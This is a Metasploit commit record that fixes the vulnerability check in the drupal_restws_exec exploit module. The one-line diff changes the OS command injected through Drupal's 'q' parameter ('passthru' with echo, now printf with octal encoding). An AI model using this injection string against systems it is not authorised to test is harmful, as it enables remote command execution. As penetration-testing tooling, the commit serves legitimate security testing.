Land #7113, check fix for drupal_restws_exec

bug/bundler_fix
William Vu 2016-07-21 14:48:58 -05:00
commit ec63f8feaf
No known key found for this signature in database
GPG Key ID: 68BD00CE25866743
1 changed files with 1 additions and 1 deletions

View File

@ -59,7 +59,7 @@ class MetasploitModule < Msf::Exploit::Remote
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'index.php'),
'vars_get' => {
'q' => "taxonomy_vocabulary//passthru/echo #{r}"
'q' => "taxonomy_vocabulary//passthru/printf '#{Rex::Text.to_octal(r)}'"
}
)
if res && res.body.include?(r)